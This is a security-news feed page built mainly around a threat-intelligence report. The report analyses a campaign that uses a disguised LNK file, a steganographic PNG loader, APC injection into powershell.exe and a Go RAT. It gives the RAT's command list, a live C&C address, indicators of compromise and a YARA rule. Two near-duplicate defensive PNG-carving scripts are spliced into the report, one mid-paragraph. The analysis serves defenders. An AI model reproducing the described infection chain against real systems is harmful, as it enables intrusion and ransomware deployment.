Is critical journalism under attack? A recent exposé reveals a disturbing trend: Companies, in this case, an Indian…

by Hackread

2024-07-24 13:41:17

Operation ShadowCat: Targeting Indian Political Observers via a Stealthy RAT

Key Takeaways

- Cyble Research and Intelligence Labs (CRIL) came across an intriguing shortcut (.LNK) file masquerading as a legitimate Office document.
- When the user executes the LNK file, it triggers the infection process, which runs a PowerShell command to drop and execute a .NET loader, ultimately delivering the final payload to the victim's machine.
- The Threat Actor (TA) employs steganography to conceal a malicious Gzip-compressed payload within a PNG file, which is hosted on a Content Delivery Network (CDN).
- The decompressed payload is then injected into PowerShell.exe using the Asynchronous Procedure Call (APC) injection method.
- The final payload is a RAT (Remote Access Trojan) written in Go. It is designed to take control of the compromised machine and deploy ransomware on the victim's device.
- The TA excludes infections from Russian-speaking regions, indicating that the TA could potentially be a Russian-speaking individual or group.
- Based on the lure used in this campaign, we observed that the TA is targeting individuals with a keen interest in Indian political affairs. This could include government officials, political analysts, journalists, researchers, and think tanks who closely follow parliamentary proceedings.

Overview

A security researcher first detected and reported a similar variant in 2023. Based on these similarities, we suspect that the malicious LNK file is distributed to users via spam email.

The attack starts with a deceptive shortcut (.LNK) file that deceives users into opening it. Once executed, the .LNK file runs a PowerShell command that drops a malicious .NET loader file and a decoy Word document on the victim’s machine. The PowerShell script then invokes methods in the .NET file, which are designed to fetch a steganographic PNG image from a remote server. This image contains a Gzip-compressed payload. The methods also decompress the payload and inject it into the PowerShell.exe process.
These actions are executed entirely in memory to avoid detection by security products.

Cyble Research & Intelligence Labs has dubbed this attack "Operation ShadowCat" due to its stealthy characteristics, including the use of a C&C server at “use1.netcatgroup.site” and the custom "NetCat" subprotocol employed for WebSocket communication.

The final payload is a RAT written in the Go programming language. This RAT provides extensive control over the infected system, enabling file and directory manipulation, command execution, and interactive communication with a Command & Control server.

Upon successful infection, this RAT can enable ransomware activities, stage environments for payload deployment, gather detailed system information, perform network scanning, and upload sensitive data from the victim’s machine. It also uses tools for Active Directory mapping and credential extraction, facilitating advanced lateral movement and attack strategies. The figure below shows an overview of the infection.

Figure 1 - Overview of the Attack

Technical Analysis

The attack originates from a shortcut file named “Untitled Document.LNK”. This file appears to be a Word document but conceals its malicious content within the Shortcut Target path, as shown below.

Figure 2 - Properties of .LNK file

When the user executes the LNK file, it loads the embedded PowerShell script, as shown in the figure below.

Figure 3 - Malicious PowerShell script

The PowerShell script can be divided into four sections:

- Execution prevention based on geo-location
- De-obfuscating strings through character manipulation
- Self-deleting the LNK file and creating and opening a lure document
- Creating and executing a malicious DLL file

Execution Prevention Based on Geo-Location

The initial section of the PowerShell script in the LNK file is designed to prevent execution in specific countries. It retrieves the victim’s system's GeoID using the “Get-WinHomeLocation” command.
If the GeoID matches any of the specified values listed in the table below, the script terminates its execution. These checks are intended to exclude the threat actors’ specified locations or countries from this attack. The table below shows the GeoID and the respective locations.

Geographical identifier | Location
3   | Afghanistan
5   | Azerbaijan
7   | Armenia
29  | Belarus
130 | Kyrgyzstan
137 | Kazakhstan
152 | Moldova
154 | Mongolia
203 | Russia
228 | Tajikistan
238 | Turkmenistan
247 | Uzbekistan

Next, the script begins to de-obfuscate an array of strings. This array contains five strings, as shown in the image below, each of which represents obfuscated data, including base64-encoded strings, PowerShell commands, and URLs necessary for the subsequent stages of the infection chain.

Figure 4 - Obfuscated strings

The image below shows the de-obfuscated strings.

Figure 5 - De-obfuscated strings

The next section of the PowerShell script is intended to delete the original LNK file and open a lure document. The image below displays the code responsible for generating the document.

Figure 6 - Generating lure document

Before creating the lure document, the script first searches the current directory for any ".LNK" files that have the same size as the original LNK file. If any such files are found, the script deletes them and then writes the base64-decoded content to a new file with the same name as the original LNK file but with a ".docx" extension.

Lure Document

The script then opens the newly created lure document, which appears to be a question posed to the Indian parliament, submitted by a member of the Rajya Sabha or “Council of States” in India. The image below shows the lure document.

Figure 7 - Lure document

Based on the lure document, it is evident that the Threat Actor (TA) is targeting individuals who have a specific interest in Indian political affairs.
This suggests a strategic approach to select victims who are likely to be involved in or have significant knowledge regarding political matters in India. The targeted individuals may include government officials, political analysts, journalists, researchers, or think tanks who closely follow parliamentary proceedings.

The final section of the PowerShell script is designed to load a malicious binary file (DLL) decoded from base64 in one of two ways. The first method loads and executes the DLL content directly in memory using "Reflection.Assembly" without writing it to disk. The second method serves as a fallback if the direct in-memory execution fails: it writes the DLL content to a file named “daephaphahph.dll” in the “%temp%” directory and then loads it. The image below shows the code responsible for loading the DLL file.

Figure 8 - Loading malicious binary file

Once the DLL file is loaded into PowerShell's memory, it uses the previously de-obfuscated URLs for further execution. The image below demonstrates the PowerShell script executing methods within the loaded DLL file, passing the URLs as parameters along with the Username and UserDomain.

Figure 9 - PowerShell script calls DLL methods

The loaded .NET assembly file functions as a shellcode loader, first determining the victim's system architecture. If the system supports 64-bit architecture, the malware retrieves a PNG file named "x86_64.png". For a 32-bit system, it fetches a PNG file named "x86.png" using the URLs passed to the function, as illustrated in the figure below.

Figure 10 - System Architecture Check

Steganography Technique

Upon successfully obtaining the PNG content, the DLL file proceeds to parse the PNG file and decompress the hidden GZip content present within the image, as shown below.

During the course of our research, we observed that this image also appeared on a predominantly Russian-speaking social media platform.
The TA may have altered this image to help deliver malware, leading us to suspect that they could also be of Russian origin.

Figure 11 - Steganography PNG Image

The decompressed stream contains shellcode and an MZ header, as shown in the image below. The shellcode is generated using Donut, an open-source project.

Figure 12 - Shellcode along with final payload

APC (Asynchronous Procedure Call) Injection

The .NET loader executes the shellcode using the APC injection method. The APIs required for the injection are encrypted, base64 encoded and stored in the binary as hardcoded strings. The loader retrieves the API names by performing a simple XOR operation, passing the encrypted string and key as parameters to a function, as shown below.

Figure 13 - XOR operation to decrypt strings

After getting the APIs required for injection, the .NET DLL creates a new process called "powershell.exe" in a suspended state using the CreateProcess() API with the CREATE_SUSPENDED flag. This ensures that the “powershell.exe” process is created but does not start executing immediately. Then, it uses the WriteProcessMemory() API to write the shellcode and the PE (Portable Executable) file extracted from the PNG file into the memory space of the suspended “powershell.exe” process.

Subsequently, it uses the QueueUserAPC() API to queue an Asynchronous Procedure Call (APC) to a thread within the suspended process. The queued APC will execute the shellcode when the thread enters a resume state.

Finally, the DLL calls the ResumeThread() API to resume the main thread of the suspended process, causing it to execute the queued APC and thereby run the injected shellcode, as shown below. The shellcode subsequently loads and executes the embedded binary, facilitating further malicious activities.

Figure 14 - Invoking ResumeThread Win32 API

Final Payload

The final payload is a Go-compiled file with a size of approximately 8.4 MB.
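A defender-side check for the steganography step described above, added here as an example and not part of Cyble's report or tooling: it walks a PNG's chunks and looks for a gzip member either appended after the IEND chunk or carried inside a chunk payload (the report does not say which placement the campaign used, so both are assumed and checked), then reports whether the inflated stream contains an MZ header. The sample images and the "shellcode followed by MZ" stand-in are constructed inline.

```python
"""Scan a PNG for a gzip stream hidden after IEND or inside a chunk payload.

Constructed example for this write-up; it is not Cyble's tooling. Where the
campaign placed the gzip stream is not stated, so both placements are checked.
"""
import gzip
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
GZIP_MAGIC = b"\x1f\x8b"


def parse_png_chunks(data):
    """Return ([(type, payload, offset), ...], end_offset) up to and including IEND."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    chunks, pos = [], len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        chunks.append((ctype, payload, pos))
        pos += 12 + length  # 4 length + 4 type + payload + 4 CRC
        if ctype == b"IEND":
            break
    return chunks, pos


def try_gunzip(blob):
    """Inflate one gzip member at the start of blob; None unless it is complete and valid.
    decompressobj(wbits=16+MAX_WBITS) checks the gzip header and ignores bytes after
    the member, unlike gzip.decompress(), which rejects trailing data."""
    d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)
    try:
        out = d.decompress(blob)
    except zlib.error:
        return None
    return out if d.eof else None


def describe_payload(where, offset, decompressed):
    # The report describes shellcode followed by an MZ header, so "MZ" anywhere
    # in the inflated stream (not only at byte 0) is the signal worth flagging.
    mz = decompressed.find(b"MZ")
    return {"where": where, "offset": offset, "decompressed_size": len(decompressed),
            "contains_mz": mz != -1, "mz_offset": mz}


def scan_png(data):
    """Return a list of findings, one per gzip member that inflates cleanly."""
    chunks, end = parse_png_chunks(data)
    findings = []
    trailing = data[end:]
    idx = trailing.find(GZIP_MAGIC)
    if idx != -1:
        out = try_gunzip(trailing[idx:])
        if out is not None:
            findings.append(describe_payload("after IEND", end + idx, out))
    for ctype, payload, off in chunks:
        idx = payload.find(GZIP_MAGIC)
        while idx != -1:  # a stray 1f8b inside IDAT fails to inflate and is skipped
            out = try_gunzip(payload[idx:])
            if out is not None:
                name = ctype.decode("ascii", "replace") + " chunk"
                findings.append(describe_payload(name, off + 8 + idx, out))
                break
            idx = payload.find(GZIP_MAGIC, idx + 1)
    return findings


def png_chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


# Constructed stand-in for "shellcode followed by an MZ header": NOPs, then an MZ stub.
FAKE_STAGE = b"\x90" * 32 + b"MZ" + b"\x00" * 30 + b"PE\x00\x00" + b"A" * 200


def build_clean_png():
    """A valid 1x1 RGB PNG with nothing hidden in it (constructed sample)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\xff\x00\x00")  # filter byte + one red pixel
    return (PNG_SIGNATURE + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b""))


def build_png_with_trailing_gzip():
    """Gzip member appended after IEND: image viewers ignore it, a loader would not."""
    return build_clean_png() + gzip.compress(FAKE_STAGE)


def build_png_with_gzip_in_chunk():
    """Gzip member carried inside a tEXt chunk inserted before IEND."""
    clean = build_clean_png()
    body, iend = clean[:-12], clean[-12:]  # the IEND chunk is exactly 12 bytes
    hidden = png_chunk(b"tEXt", b"Comment\x00" + gzip.compress(FAKE_STAGE))
    return body + hidden + iend


if __name__ == "__main__":
    for label, sample in [("clean", build_clean_png()),
                          ("trailing", build_png_with_trailing_gzip()),
                          ("in-chunk", build_png_with_gzip_in_chunk())]:
        print(label, scan_png(sample))
```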
The following publicly available Go utilities are utilized in this binary:

- HashiCorp Yamux: a multiplexing library for Golang that operates over a reliable and ordered underlying connection, such as TCP or Unix domain sockets. The TA is abusing Yamux to multiplex multiple communication streams over a single connection, making their network traffic less conspicuous.
- Secsy goftp: an open-source high-level FTP client utilized by the TA to facilitate file transfers or downloads on a compromised system.

Despite the complexity of reverse-engineering Go binaries, we successfully obtained insights through the examination of memory strings. Further analysis revealed several memory strings that confirm the malware's behavior as a Remote Access Trojan (RAT). The RAT executes the following commands.

Command | Description
discover/walker | Traverses directories to collect information about files and directories.
filesys/append | Appends data to a file.
filesys/create | Creates a new file.
filesys/delete | Deletes a file.
filesys/lsdir | Lists files in the directory.
filesys/mkdir | Creates a new directory.
filesys/read | Reads data from a file.
filesys/rename | Renames a file.
filesys/truncate | Truncates a file to a specified size.
filesys/write | Writes data to a file.
interact | Engages in interactive communication with a C&C server.
command | Executes a command, likely on a remote system.
network/listen | Listens for incoming network connections.
network/tlsdial | Establishes a network connection using TLS encryption.
persist | Creates persistence.
process/kill | Terminates a process.
ransom | Deploys ransomware.
stager/earlybird | Executes an early-stage payload.
sysinfo/curuser | Retrieves information about the current user.
sysinfo/install | Gathers installation-related information.
sysinfo/network | Collects network-related information.
sysinfo/osvers | Retrieves the operating system version information.
discover/tcpscan | Scans for open TCP ports on a network.
upload/post | Uploads data, possibly via HTTP POST requests.
upload/ftpc | Uploads data using FTP (File Transfer Protocol).
tools/sharphound | Performs Active Directory enumeration.
tools/mimikatz | Extracts plaintext passwords, hashes, PINs, and Kerberos tickets from lsass.exe memory.
tools/rubeus | Facilitates Kerberos ticket extraction, manipulation, and pass-the-ticket attacks.

C&C Communication

The RAT connects to its Command & Control (C&C) server via a WebSocket connection on port 443. Utilizing WebSockets over port 443, which is usually designated for secure HTTPS traffic, helps the RAT bypass traditional network security measures, as WebSocket traffic is often less monitored and more challenging to detect compared to standard HTTP or other protocols.

The RAT initiates a GET request to “wss://use1.netcatgroup.site/ctrl/”, seeking to use a custom subprotocol called “NetCat.” The custom “NetCat” subprotocol suggests that the RAT may be using Netcat-like features for establishing a reverse shell, transferring data, executing commands, or performing remote control operations. The figure below shows the communication to its C&C server.

Figure 15 - C&C communication

Threat Actor Attribution

The threat actor appears to avoid infecting systems in nations where Russian is either the official language or spoken widely, suggesting a deliberate self-imposed restriction. This strategy is likely intended to mitigate potential backlash or reduce exposure in regions where they may have a presence or be known. Such tactics are commonly observed among Ransomware-as-a-Service (RaaS) groups.

Additionally, the original, unedited image that the TA later altered via steganography was posted on a social media platform commonly used by Russian-speaking users, yet another factor that may indicate that the TA is either a Russian speaker or group.
Based on the available evidence, we cannot attribute this activity to any specific threat actor or Advanced Persistent Threat (APT) group at this time. However, the nature of the attack and its operational patterns indicate that it may be the work of a financially motivated group. The observed linguistic and operational characteristics lead us to suspect that the perpetrators could be a Russian-speaking group or a RaaS entity.

Conclusion

This campaign demonstrates a highly sophisticated attack that utilizes a shortcut file (.LNK) to execute PowerShell commands, which then deploys a .NET loader and a malicious payload concealed within a PNG file using steganography. The final payload, a RAT written in Go, facilitates remote access and potential ransomware deployment.

The threat actor’s intentional avoidance of Russian-speaking nations indicates a strategy to minimize detection and backlash. Additionally, targeting individuals interested in Indian political affairs suggests a calculated approach. Although we cannot precisely attribute the activity to a specific threat actor or APT group, the evidence suggests it is likely the work of a financially motivated, Russian-speaking group or Ransomware-as-a-Service (RaaS) entity.

Recommendations

- This campaign reaches users via potential phishing campaigns, so exercise extreme caution when handling email attachments and external links. Always verify the legitimacy of the sender and links before opening them.
- Monitor network traffic, even if it appears to come from trusted CDNs. It’s important to correlate and verify the traffic before allowing it.
- Consider disabling or limiting the execution of scripting languages on user workstations and servers if they are not essential for legitimate purposes.
Implement application whitelisting to ensure only approved and trusted applications and DLLs can execute on your systems  Segment your organization’s networks to limit the spread of malware  Deploy strong antivirus and anti-malware solutions to detect and remove malicious files.   MITRE ATT&CK® Techniques  Tactic  Technique  Procedure  Initial Access (TA0001)    Spearphishing Attachment (T1566.001)    .LNK file shared as mail attachments  Execution (TA0002)  User Execution: Malicious File (T1204.002)  User opens an .LNK file as a file pretending to be an Office Document  Execution (TA0002)  Command and Scripting Interpreter: PowerShell (T1059.001)  Embedded PowerShell commands executed    Defense Evasion (TA0005)  Masquerading: Masquerade File Type (T1036.008)  LNK file disguised as a legitimate office file   Discovery (TA0007)  System Location Discovery (T1614)  Checks GeoLocation using (Get-WinHomeLocation).GeoID  Defense Evasion (TA0005)  Indicator Removal: File Deletion (T1070.004)  Self-Deleting .LNK file after execution   Defense Evasion (TA0005)  System Information Discovery  (T1082)  Checking for System architecture using “Int.ptr”   Command and Control (TA0011)  Obfuscated Files or Information: Steganography (T1027.003)  Malicious GZip compressed stream is hidden inside a PNG file   Defense Evasion (TA0005)  De-obfuscate/Decode Files or Information (T1140)  API and other program strings are obfuscated   Execution (TA0002)  Native API (T1106)  CreateProcess(),QueueUserAPC() used for Process Injection  Privilege   Escalation  (TA0004)   Process Injection: Asynchronous Procedure Call (T1055.004)   Using QueueUserAPC, it injects the shellcode into powershell.exe  C&C  (TA0011)   Application Layer Protocol: Web Protocols (T1071.001)  Stealer communicates with the C&C server.  
Indicators of Compromise

Indicator | Indicator Type | Description
ffe5b09cbc0073be33332436150c81edfa952d2af749160699fc8b10b912ef35 | SHA256 | ZIP attachment
6f4dc0d9fe5970586403865d551bbea13e2ceb1bfe41f22e235a6456a5ec509b | SHA256 | LNK file
168182578da46de165d10e6753d1c7db7b214efc723c89c6d9d0038264abad54 | SHA256 | Dropped DLL file
8edc8f3eed761694c6b1df740de376f9e12f82675df7507417adb2c8bbedd8da | SHA256 | x86.png
ac957c501867a86c13045fa72d53faacb291cc8b6b2750915abc1b5815b164c6 | SHA256 | x86_64.png
c42ea4d3c8b6ae2c4727a11de65f624a70dabba46c1996aa545de35a58804802 | SHA256 | Final injected payload PE file (32-bit)
83d6e377a5527f41d8333f8eb0d42f7c6a24f8694ed3caceb3a1e63de7b23e9d | SHA256 | Final injected payload PE file (64-bit)
aef4d36ce252a9181767f263b1cbd831ac79f6e80516aa640222f9c56b06de4f | SHA256 | PE file with shellcode
hxxps://suquaituupie.global.ssl.fastly[.]net/static/x86.png?u= | URL | PNG file containing the GZip stream (32-bit)
hxxps://suquaituupie.global.ssl.fastly[.]net/static/x86_64.png?u= | URL | PNG file containing the GZip stream (64-bit)
use1.netcatgroup[.]site | Domain | C&C
suquaituupie.global.ssl.fastly[.]net | Domain | Payload hosting

Yara Rule

rule Go_based_RAT
{
    meta:
        author = "Cyble Research and Intelligence Labs"
        description = "Detects RAT written in GO"
        date = "2024-07-24"
        os = "Windows"
    strings:
        $a = "network/tlsdial" nocase wide ascii
        $b = "tools/sharphound" nocase wide ascii
        $c = "process/kill" nocase wide ascii
        $d = "sysinfo/osvers" nocase wide ascii
    condition:
        uint16(0) == 0x5A4D and all of them
}

The post Operation ShadowCat: Targeting Indian Political Observers via a Stealthy RAT appeared first on Cyble.

by CYBLE
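The x86.png / x86_64.png stage described in the report hides a GZip-compressed stream inside a PNG, and the YARA rule only fires on the final Go binary, not on the carrier image. The carver below is an added example, not Cyble's tooling: it walks the PNG chunk structure, verifies chunk CRCs, searches every chunk body and the bytes after IEND for a gzip header, and inflates whatever it finds. The report does not say where in the PNG the stream sits, so the carver checks both places and assumes nothing about offsets; the sample PNG it builds, the private chunk name prVt and the payload bytes are constructed for the example.

```python
"""Carve gzip streams hidden inside a PNG (added example, not Cyble's tooling)."""
import gzip
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
GZIP_MAGIC = b"\x1f\x8b\x08"  # ID1, ID2, CM = deflate


def make_chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, body, CRC32 over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def parse_png(data: bytes):
    """Walk the chunk list. Returns (chunks, trailer_offset); each chunk is
    (type, body_offset, body, crc_ok). Bytes after IEND are ignored by image
    decoders, which makes the trailer a common place to append a payload."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    chunks = []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body_off = pos + 8
        body = data[body_off:body_off + length]
        crc_bytes = data[body_off + length:body_off + length + 4]
        if len(body) < length or len(crc_bytes) < 4:
            break  # truncated chunk: treat the remainder as trailer
        crc_ok = struct.unpack(">I", crc_bytes)[0] == (zlib.crc32(ctype + body) & 0xFFFFFFFF)
        chunks.append((ctype, body_off, body, crc_ok))
        pos = body_off + length + 4
        if ctype == b"IEND":
            break
    return chunks, pos


def inflate_gzip_at(data: bytes, offset: int):
    """Inflate one gzip member starting at offset. Returns (payload, stream_length)
    or None when the magic bytes do not begin a complete, valid stream."""
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)  # +16: expect a gzip header
    try:
        payload = d.decompress(data[offset:])
    except zlib.error:
        return None
    if not d.eof:
        return None
    return payload, len(data) - offset - len(d.unused_data)


def carve_gzip_streams(data: bytes):
    """Search every chunk body and the post-IEND trailer for embedded gzip streams."""
    chunks, trailer_off = parse_png(data)
    regions = [(ctype.decode("latin-1"), off, body) for ctype, off, body, _ in chunks]
    regions.append(("trailer", trailer_off, data[trailer_off:]))
    found = []
    for name, base, blob in regions:
        start = 0
        while (hit := blob.find(GZIP_MAGIC, start)) != -1:
            result = inflate_gzip_at(data, base + hit)
            if result is None:
                start = hit + 1  # magic bytes without a valid stream: keep scanning
                continue
            payload, length = result
            found.append({"where": name, "offset": base + hit, "length": length, "payload": payload})
            start = hit + length
    return found


def build_sample_png(hidden: bytes) -> bytes:
    """Constructed 1x1 RGB PNG for the example. The gzip of `hidden` is placed in a
    private ancillary chunk (prVt) and again after IEND; neither placement is
    claimed to be what the campaign uses."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, truecolor
    idat = zlib.compress(b"\x00\xff\x00\x00")             # filter 0 + one red pixel
    gz = gzip.compress(hidden, mtime=0)
    return (PNG_SIGNATURE
            + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"IDAT", idat)
            + make_chunk(b"prVt", b"\x00" * 16 + gz)
            + make_chunk(b"IEND", b"")
            + gz)


if __name__ == "__main__":
    sample = build_sample_png(b"MZ" + b"constructed stand-in for the injected PE")
    for hit in carve_gzip_streams(sample):
        print(f"{hit['where']:>8} @0x{hit['offset']:x} len={hit['length']} head={hit['payload'][:2]!r}")
```

A chunk whose CRC does not match is worth reporting on its own: an operator who patches bytes into an existing chunk without recomputing the CRC leaves that trace, while one who appends after IEND or writes a well-formed private chunk does not, which is why the carver scans content rather than trusting structure.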

2024-07-24 13:30:58

KnowBe4 mistakenly hires North Korean hacker, faces infostealer attack

American cybersecurity company KnowBe4 says a person it recently hired as a Principal Software Engineer turned out to be a North Korean state actor who attempted to install information-stealing malware on its devices. [...]

by BleepingComputer

2024-07-24 13:30:33

Vanta raises $150 million to accelerate its AI product innovation

Vanta announced that it has raised a $150 million Series C funding round at a valuation of $2.45 billion. The round was led by Sequoia Capital, in addition to new investors Growth Equity at Goldman Sachs Alternatives, J.P. Morgan and existing investors Atlassian Ventures, Craft Ventures, CrowdStrike Ventures, HubSpot Ventures, Workday Ventures and Y Combinator. The most recent funding brings Vanta’s total funds raised to $353 million since 2021. Vanta intends to use the funding … More → The post Vanta raises $150 million to accelerate its AI product innovation appeared first on Help Net Security.

by Help Net Security

2024-07-24 13:29:21

Organizations Warned of Exploited Twilio Authy Vulnerability

CISA warns of the in-the-wild exploitation of CVE-2024-39891, a Twilio Authy bug leading to the disclosure of phone number data. The post Organizations Warned of Exploited Twilio Authy Vulnerability appeared first on SecurityWeek.

by SecurityWeek

2024-07-24 13:21:08

57,000 Patients Impacted by Michigan Medicine Data Breach

Michigan Medicine is notifying roughly 57,000 individuals of a data breach impacting their personal and health information. The post 57,000 Patients Impacted by Michigan Medicine Data Breach appeared first on SecurityWeek.

by SecurityWeek

2024-07-24 13:00:00

Crisis communication: What NOT to do

Read the 1st blog in this series, Cybersecurity crisis communication: What to do When an organization experiences a cyberattack, tensions are high, customers are concerned and the business is typically not operating at full capacity. Every move you make at this point makes a difference to your company’s future, and even a seemingly small mistake can […] The post Crisis communication: What NOT to do appeared first on Security Intelligence.

by Security Intelligence

2024-07-24 12:41:28

Siemens Patches Power Grid Product Flaw Allowing Backdoor Deployment

Siemens has released out-of-band updates to patch two potentially serious vulnerabilities in products used in energy supply.  The post Siemens Patches Power Grid Product Flaw Allowing Backdoor Deployment appeared first on SecurityWeek.

by SecurityWeek

2024-07-24 12:15:00

How CISO roles have evolved with GRC

As cyberattacks become a top-of-mind concern, CISOs are having to step up their C-suite presence, prepare for strict reporting requirements, and deal with rising stakes.

by Hack The Box Blog

2024-07-24 12:09:46

Google Chrome now warns about risky password-protected archives

Google Chrome now warns when downloading risky password-protected files and provides improved alerts with more information about potentially malicious downloaded files. [...]

by BleepingComputer

2024-07-24 11:58:09

Paris Wi-Fi Security Study | Kaspersky official blog

Kaspersky experts investigated the security of public Wi-Fi access points in Paris ahead of the Olympics.

by Kaspersky

2024-07-24 11:52:00

Mimecast to buy insider threat specialist Code42

by ComputerWeekly

2024-07-24 11:45:00

Microsoft Defender Flaw Exploited to Deliver ACR, Lumma, and Meduza Stealers

A now-patched security flaw in the Microsoft Defender SmartScreen has been exploited as part of a new campaign designed to deliver information stealers such as ACR Stealer, Lumma, and Meduza. Fortinet FortiGuard Labs said it detected the stealer campaign targeting Spain, Thailand, and the U.S. using booby-trapped files that exploit CVE-2024-21412 (CVSS score: 8.1). The high-severity

by The Hacker News

2024-07-24 11:43:52

Dazz snaps up $50M for AI-based, automated cloud security remediation

The startup is not disclosing its valuation, but sources close to the company say the figure is just under $400 million post-money. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-24 11:42:30

Streamline your cybersecurity and compliance efforts at scale

To streamline your compliance efforts and scale your cybersecurity program, you need to save time and money while consolidating effort. Here's how resources from the Center for Internet Security® (CIS®) can help.

by SC Media

2024-07-24 11:26:00

CISA Adds Twilio Authy and IE Flaws to Exploited Vulnerabilities List

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities are listed below - CVE-2012-4792 (CVSS score: 9.3) - Microsoft Internet Explorer Use-After-Free Vulnerability CVE-2024-39891 (CVSS score: 5.3) - Twilio Authy Information Disclosure

by The Hacker News

2024-07-24 11:01:49

GitLab Customers Hope to Stay Out of the Doghouse if Acquired by Datadog

Rumors of Datadog acquiring GitLab could reshape the DevOps landscape by consolidating CI/CD and monitoring tools, offering a seamless experience but posing integration challenges.

by ITPro Today

2024-07-24 11:01:06

Stargazers Ghost Network

Research by: Antonis Terefos (@Tera0017) Key Points Introduction Threat actors continually evolve their tactics to stay ahead of detection. Traditional methods of malware distribution via emails containing malicious attachments are heavily monitored, and the general public has become more aware of these tactics. Recently, Check Point Research observed threat actors using GitHub to achieve initial […] The post Stargazers Ghost Network appeared first on Check Point Research.

by Check Point Research

2024-07-24 11:00:00

A Hacker ‘Ghost’ Network Is Quietly Spreading Malware on GitHub

Cybersecurity researchers have spotted a 3,000-account network on GitHub that is manipulating the platform and spreading ransomware and info stealers.

by WIRED Security News

2024-07-24 10:59:51

Windows SmartScreen Flaw Enabling Data Theft in Major Stealer Attack

New Stealer Campaign Exploits Windows SmartScreen Vulnerability (CVE-2024-21412) – This large-scale attack targets Windows users, stealing passwords, browsing…

by Hackread

2024-07-24 10:37:06

CrowdStrike software crash linked to undetected error in content update for Windows users

The company plans to add additional testing and employ canary delivery methods to safeguard customers from future disruptions.

by Cybersecurity Dive

2024-07-24 10:30:00

This Machine Exposes Privacy Violations

A former Google engineer has built a search engine, webXray, that aims to find illicit online data collection and tracking—with the goal of becoming “the Henry Ford of tech lawsuits.”

by WIRED Security News

2024-07-24 10:16:44

CrowdStrike: 'Content Validator' bug let faulty update pass checks

CrowdStrike released a Preliminary Post Incident Review (PIR) on the faulty Falcon update explaining that a bug allowed bad data to pass its Content Validator and cause millions of Windows systems to crash on July 19, 2024. [...]

by BleepingComputer

2024-07-24 10:09:37

China-linked APT group uses new Macma macOS backdoor version

China-linked APT group Daggerfly (aka Evasive Panda, Bronze Highland) has been spotted using an updated version of the macOS backdoor Macma. The group has significantly updated its malware arsenal, adding a new malware family based on the MgBot framework and an updated Macma macOS backdoor. […]

by Security Affairs

2024-07-24 10:05:04

Suspected Scattered Spider member apprehended

The arrest was based on suspected blackmail and Computer Misuse Act violations and also resulted in the seizure of the teen's digital devices.

by SC Media

2024-07-24 10:03:53

US-based lawsuits against NSO Group supported by leading tech firms

Numerous major U.S. tech firms, including Microsoft and Google, have issued an amicus brief supporting NSO Group victims' filing of lawsuits against the Israeli spyware firm.

by SC Media

2024-07-24 10:01:11

Hot topics: Can’t-miss sessions at Mandiant’s 2024 mWISE event

Now that the mWISE 2024 session catalog is out, it's time to take a closer look at the topics. Learn more from @mWISEConference about the three hottest tracks in this year's conference. [...]

by BleepingComputer

2024-07-24 10:01:01

Unprecedented global cyberattack prevalence reported in Q2

The unprecedented increase in cyberattack prevalence has been fueled by increasingly sophisticated threat actors and advancements in artificial intelligence and machine learning, an analysis from Check Point revealed.

by SC Media

2024-07-24 10:00:05

A (somewhat) complete timeline of Talos’ history

Relive some of the major cybersecurity incidents and events that have shaped Talos over the past 10 years.

by Cisco Talos Blog

2024-07-24 10:00:00

Accelerating Analysis When It Matters

Malware analysts demonstrate how to triage and analyze large amounts of samples with greater efficiency. Samples include Remcos RAT, Lumma Stealer and more. The post Accelerating Analysis When It Matters appeared first on Unit 42.

by Palo Alto Networks - Unit42

2024-07-24 09:20:51

Unlocking cyber insurance savings to fund MDR

Redirecting risk reduction spend from cyber insurance to MDR services is a win-win, resulting in better protection and lower cost coverage.

by Sophos News

2024-07-24 09:00:00

Microservices vs. Monoliths: Which Are More Secure?

Microservices offer security advantages by isolating application components, but they also introduce complexities and vulnerabilities that may outweigh these benefits.

by ITPro Today

2024-07-24 09:00:00

ConfusedFunction: A Privilege Escalation Vulnerability Impacting GCP Cloud Functions

Organizations that have used Google Cloud Platform's Cloud Functions, a serverless execution environment, could be affected by a privilege escalation vulnerability discovered by Tenable and dubbed "ConfusedFunction." Read on to learn about the vulnerability and what your organization needs to do to protect itself.

Tenable Research has discovered a vulnerability in Google Cloud Platform involving its Cloud Functions serverless compute service and its Cloud Build CI/CD pipeline service. Specifically, when a GCP user creates or updates a Cloud Function, a multi-step backend process is triggered. Among other things, this process attaches the default Cloud Build service account to the Cloud Build instance that is created as part of the function's deployment. This happens in the background and is not something ordinary users would be aware of.

The default Cloud Build service account gives the user excessive permissions. An attacker who can create or update a Cloud Function can abuse the function's deployment process to escalate privileges to the default Cloud Build service account, and can then use that account's high privileges against other GCP services that are created when a Cloud Function is created or updated, including Cloud Storage and Artifact Registry or Container Registry.

